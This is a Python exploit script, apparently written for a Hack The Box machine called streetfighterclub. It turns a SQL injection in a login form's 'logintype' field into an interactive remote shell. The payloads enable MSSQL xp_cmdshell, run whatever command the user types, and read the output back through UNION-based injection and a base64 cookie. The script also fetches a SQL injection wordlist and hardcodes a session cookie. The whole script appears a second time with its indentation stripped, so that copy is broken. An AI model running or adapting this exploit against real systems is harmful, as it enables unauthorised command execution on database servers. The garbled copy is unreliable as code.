kn0wm4d/fighter.py

## fighter.py
import requests, base64
import urllib

headers = {'Cookie':'password=secret; session=eyJ1c2VybmFtZSI6ImFkbWluIn0.DmVf_g.D1xbdFk0MZu9Ek_guHqz9RsEQeo'}
cmds = requests.get('https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/Injections/SQL.txt').text.split('\n')

class color:
    CBLINK = '\033[5m'
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

def check_status(req,method):
	if req.cookies.get('Email') != None:
		cookie = urllib.parse.unquote(req.cookies.get('Email'))
		print(base64.b64decode(cookie).decode('utf-8'))

while True:
	cmd = input('shell > ')
	params = {
	'username': 'admin',
	'password': 'admin',
	'logintype': "1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDsHell', 1;RECONFIGURE WITH OVERRIDE;drop table xavitest;create table xavitest (out varchar(8000));Insert into xavitest (out) execute xp_CmDShell '%s';EXEC sp_configure 'xp_cmDsHeLl', 0;RECONFIGURE WITH OVERRIDE;" % cmd,
	'rememberme': 'ON',
	'B1': 'LogIn'
	}
	req = requests.post('http://members.streetfighterclub.htb/old/verify.asp', allow_redirects=False, data=params)
	params = {
	'username': 'admin',
	'password': 'admin',
	'logintype': "1 UNION SELECT TOP 1 1,2,3,4,CONVERT(VARBINARY(8000),stuff((select ' ' + d.out from xavitest d where d.out = out order by d.out for xml path('')),1,1,'')),1 FROM xavitest GROUP BY out;",
	'rememberme': 'ON',
	'B1': 'LogIn'
	}
	req = requests.post('http://members.streetfighterclub.htb/old/verify.asp', allow_redirects=False, data=params)
	check_status(req,'POST')
	import requests, base64
	import urllib

	headers = {'Cookie':'password=secret; session=eyJ1c2VybmFtZSI6ImFkbWluIn0.DmVf_g.D1xbdFk0MZu9Ek_guHqz9RsEQeo'}
	cmds = requests.get('https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/Injections/SQL.txt').text.split('\n')

	class color:
	CBLINK = '\033[5m'
	HEADER = '\033[95m'
	OKBLUE = '\033[94m'
	OKGREEN = '\033[92m'
	WARNING = '\033[93m'
	FAIL = '\033[91m'
	ENDC = '\033[0m'
	BOLD = '\033[1m'
	UNDERLINE = '\033[4m'

	def check_status(req,method):
	if req.cookies.get('Email') != None:
	cookie = urllib.parse.unquote(req.cookies.get('Email'))
	print(base64.b64decode(cookie).decode('utf-8'))

	while True:
	cmd = input('shell > ')
	params = {
	'username': 'admin',
	'password': 'admin',
	'logintype': "1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDsHell', 1;RECONFIGURE WITH OVERRIDE;drop table xavitest;create table xavitest (out varchar(8000));Insert into xavitest (out) execute xp_CmDShell '%s';EXEC sp_configure 'xp_cmDsHeLl', 0;RECONFIGURE WITH OVERRIDE;" % cmd,
	'rememberme': 'ON',
	'B1': 'LogIn'
	}
	req = requests.post('http://members.streetfighterclub.htb/old/verify.asp', allow_redirects=False, data=params)
	params = {
	'username': 'admin',
	'password': 'admin',
	'logintype': "1 UNION SELECT TOP 1 1,2,3,4,CONVERT(VARBINARY(8000),stuff((select ' ' + d.out from xavitest d where d.out = out order by d.out for xml path('')),1,1,'')),1 FROM xavitest GROUP BY out;",
	'rememberme': 'ON',
	'B1': 'LogIn'
	}
	req = requests.post('http://members.streetfighterclub.htb/old/verify.asp', allow_redirects=False, data=params)
	check_status(req,'POST')